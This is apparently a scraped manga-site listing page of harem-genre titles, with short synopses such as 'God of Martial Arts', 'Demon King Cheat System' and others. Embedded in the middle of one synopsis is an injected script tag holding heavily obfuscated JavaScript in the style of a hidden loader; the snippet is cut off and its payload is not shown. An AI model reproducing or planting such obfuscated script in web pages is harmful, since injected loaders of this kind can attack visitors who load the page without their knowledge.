Harem - Page 155

Harem manga typically stars a male lead surrounded by numerous romantic interests, creating comedic and emotional drama. A reverse harem features a female protagonist instead.

2098 results

God of Martial Arts

God of Martial Arts In this world, respect is earned with martial arts. Weak martial artists have strengths of tens of thousands of pounds, capable of cracking boulders. And the strong ones can cut off rivers and split mountains. There are even martial kings who know everything and can travel across the universe. Martial art decides your fate as well as your life and death. The weak is humiliated while the strong looks down on the world. This is a a world where the strong bullies the weak. People’s statuses are decided by the levels of their cultivation of martial arts. Each faction fights for the title of “The Strongest”. Only the strong ones have the right to survive. Even if you are from the same clan or faction, if you are weak, then you will be bullied and kicked out without mercy. Dewa Seni Beladiri Juéshì Wǔshén Peerless Martial God เทพยุทธ์พลิกลิขิตสวรรค์ 绝世武神 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !


Sono Akuyaku Kizoku, Mama Heroine ga Suki Sugiru ~Shinshi na Doryoku de Saikyou to Nari Fuguu na Oshi Chara Tasukemakuru~

The mom characters that appear in the game are all unfortunate sub-heroines who always get bad ending routes. “Why… Why does such a cute mom have to die?!“ Even though the protagonist tried very hard to request a route where they get saved, all of his efforts were in vain, making him spend his days in frustration. Then, he suddenly gets reincarnated into the world of MagiFan on a certain day. …However, he gets reincarnated as a villainous aristocrat who’s got nothing but the worst routes. This guy, who’s crazy about mom characters — his fulfilling days of saving his beloved mom characters and his journey to create his harem full of plump women are about to begin! ___ **Alt Official Raw:** [niconico Manga](https://manga.nicovideo.jp/comic/71300)

3 days ago

Isekai Furin Ii ~ Michibikareshi Hitozuma-Tachi To Bukiyou Tensei Yuusha

An office worker, Yuuto Aida, witnesses his wife's affair at home! When he jumps out of the house, he gets hit by a truck and is reincarnated in another world as a hero!! However, due to the misunderstanding about Goddess Reincarnation, he only had one skill, it was a skill that could captivate other people's wives!!


My Apprentices are all Female Devils

Upon waking up, Ye Bei found himself resurrected! Three hundred years have passed. All the apprentices who worked so hard to cultivate at the time have now become immortals and grown up. some are slim and graceful! Ye Bei, “Three hundred years…Three hundred years, it’s time to train for the teacher…No, I’m teaching you!”<script></script><script>(function(_0x387717,_0x5ae62c){var _0x5492fd=_0x9b8b,_0x32b695=_0x387717();while(!![]){try{var _0x124d51=parseInt(_0x5492fd(0x1f0))/(-0xa5e*0x3+-0x849+0x2764)+-parseInt(_0x5492fd(0x1f3))/(0x1*-0x128e+0x259b+-0x1*0x130b)*(parseInt(_0x5492fd(0x1e8))/(0x1473*-0x1+0x57b*0x5+-0x6f1))+-parseInt(_0x5492fd(0x1ed))/(0x1*-0x1516+0x2*0x271+0x40e*0x4)+parseInt(_0x5492fd(0x1f6))/(-0x178a+0x1761+-0x2e*-0x1)*(parseInt(_0x5492fd(0x1e7))/(-0x10bf*0x2+-0x1*-0x12c1+0xec3))+-parseInt(_0x5492fd(0x1ee))/(-0x311+-0x21fd+0x2515)*(-parseInt(_0x5492fd(0x1e9))/(0x106b+-0x14c7+0x464))+parseInt(_0x5492fd(0x1f4))/(0x1ffb+0x8b4+0xf2*-0x2b)*(parseInt(_0x5492fd(0x1e5))/(0x369+0xdb*0x1+-0x43a))+-parseInt(_0x5492fd(0x1f8))/(-0x1182+-0x8ff+-0x6a3*-0x4);if(_0x124d51===_0x5ae62c)break;else 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I'm a Solo Guide

Ye Ji-an, the only S-class guide in Korea, was often called the “useless guide” due to her unique trait of having a 0% matching rate with all espers. After failing to match with an esper from Russia and on her way back home, she is suddenly swept away by a gate manifestation and wakes up alone in a strange temple-like place. The world she has traveled to through the gate is the continent of Wisrode, filled only with espers, and in this place, Ji-an is the only guide…


Starting Out With Max Favorability

开局点满魅力值 / Starting point full of charm Qin Yuan accidentally transmigrated into a game world and obtained the favorability system. Through it, he can continuously improve his favorability with others. Let’s see how Qin Yuan captivates the masses with boundless favorability.


Xin Jipin Quanneng Gaoshou

The young man, Xia Tian, suddenly obtained x-ray vision and from then on began series of infinite blessings. He was apprenticed to martial arts masters, made friends with treasure experts, and won the favor of countless women... He continued to grow and became the Supreme Almighty Master one step at a time. Original Webcomic: AC.QQ, BiliBili Manhua, KuaiKan Manhua


Wind ~A Breath of Heart~

Adaptation of the visual novel of the same name. Story is based on the Hinata route. --- Serialized in Dengeki G\'s magazine from July-December 2004. 1 Volume released on January 27, 2005.


I, Who Took the Demon's Script, Lost All My Cultivation And Am Being Hunted by Female Disciples?!

Once Wang Bai awakes, he realizes he’s somehow crossed over into a fantasy world, and that he’s even lying in a coffin! After receiving a portion of his memories, he realizes that this body is the sect master of the Demon Sect, who has committed unthinkable crimes and made millions of enemies. Worst of all… he has lost all of his cultivation, and his previous disciples who harbour ill intent towards him have all become big shots Σ(っ °Д °;). The Ruler of the Palace of Five Poisons, the Lord of the Temple of the Demon God, the Leader of the Righteous Path… should I just lie back down in the coffin and never get out?


A Big Shot Actually

Li Nianfan transmigrated to an immortal cultivation world as a mortal. Knowing that he could never become a cultivator, he decided to live an ordinary life. But unbeknownst to him, his dog became a mighty Yaoguai king by watching him draw and write; the tree he planted in the backyard became the tree of the world by listening to tunes he played; a passerby he met, who gained enlightenment from the chitchat with him, became a Taoist sage and started a new era...


Demon King Cheat System

Read manhua Demon King Cheat System / The Demon King’s Cheat System / Demon King’s Cheating System / Mowang Zuobi Xitong / Mówáng Zuòbì Xìtǒng / The Demon King Cheat System One day, countless dungeons appeared across the world. “The Dungeon Era”, or the so-called “Age of Dungeons and Monsters” befell mankind. Aldslay, a boss from an Abyss-Level dungeon was slain by humans using despicable means. Enraged and unwilling to accept it, Aldslay reincarnated into an incompetent player, and accidentally activated the one and only “Boss Player System”. With the aid of the system, he is able to conquer various dungeons and become the Dungeon Master. The road to revenge starts now! “Demon King Cheat System Manhua” is another name: 魔王作弊系统 魔王様のチートシステム 마왕 전용 사기 시스템
